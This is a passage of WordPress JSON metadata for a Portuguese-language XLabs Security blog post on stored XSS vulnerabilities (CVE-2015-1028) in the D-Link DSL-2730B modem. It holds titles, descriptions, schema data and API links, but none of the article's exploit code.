vulnerabilidades de Cross Site Scripting...","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/","og_locale":"pt_BR","og_type":"article","og_title":"D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog","og_description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.","og_url":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/","og_site_name":"XLabs Security Blog","article_publisher":"https:\/\/www.facebook.com\/xlabs","article_published_time":"2015-01-11T03:21:38+00:00","article_modified_time":"2021-08-25T20:43:54+00:00","og_image":[{"width":1000,"height":488,"url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/d-link-modem-dsl-2730b-xss-injection-stored-blog-post-xlabs.png","type":"image\/png"}],"author":"Mauricio Corr\u00eaa","twitter_card":"summary_large_image","twitter_title":"D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog","twitter_description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.","twitter_image":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/01\/d-link-modem-dsl-2730b-xss-injection-stored-blog-post-xlabs.png","twitter_misc":{"Escrito por":"Mauricio Corr\u00eaa","Est. tempo de leitura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/#article","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/"},"author":{"name":"Mauricio Corr\u00eaa","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d"},"headline":"CVE-2015-1028 D-Link Modem DSL-2730B XSS Injection Stored","datePublished":"2015-01-11T03:21:38+00:00","dateModified":"2021-08-25T20:43:54+00:00","mainEntityOfPage":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/"},"wordCount":288,"publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"keywords":["Cross Site Scripting","D-Link","DSL-2730B","XSS Injection Stored"],"articleSection":["Falhas de Seguran\u00e7a"],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/","url":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/","name":"D-Link Modem DSL-2730B XSS Injection Stored &ndash; XLabs Security Blog","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#website"},"datePublished":"2015-01-11T03:21:38+00:00","dateModified":"2021-08-25T20:43:54+00:00","description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-2730B, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting...","breadcrumb":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-1028-d-link-modem-dsl-2730b-xss-injection-stored\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.xlabs.com.br\/blog\/"},{"@type":"ListItem","position":2,"name":"CVE-2015-1028 D-Link Modem DSL-2730B XSS Injection Stored"}]},{"@type":"WebSite","@id":"https:\/\/www.xlabs.com.br\/blog\/#website","url":"https:\/\/www.xlabs.com.br\/blog\/","name":"XLabs Security Blog","description":"Seguran\u00e7a da Informa\u00e7\u00e3o","publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/www.xlabs.com.br\/blog\/#organization","name":"XLabs Security","url":"https:\/\/www.xlabs.com.br\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","contentUrl":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","width":478,"height":168,"caption":"XLabs Security"},"image":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.instagram.com\/xlabs.security","https:\/\/www.linkedin.com\/company\/xlabs-security\/","https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber","https:\/\/www.facebook.com\/xlabs"]},{"@type":"Person","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d","name":"Mauricio Corr\u00eaa","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","caption":"Mauricio Corr\u00eaa"},"url":"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/"}]}},"_links":{"self":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/339"}],"collection":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/comments?post=339"}],"version-history":[{"count":29,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/339\/revisions"}],"predecessor-version":[{"id":1590,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/posts\/339\/revisions\/1590"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media\/1589"}],"wp:attachment":[{"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/media?parent=339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/categories?post=339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.xlabs.com.br\/blog\/wp-json\/wp\/v2\/tags?post=339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}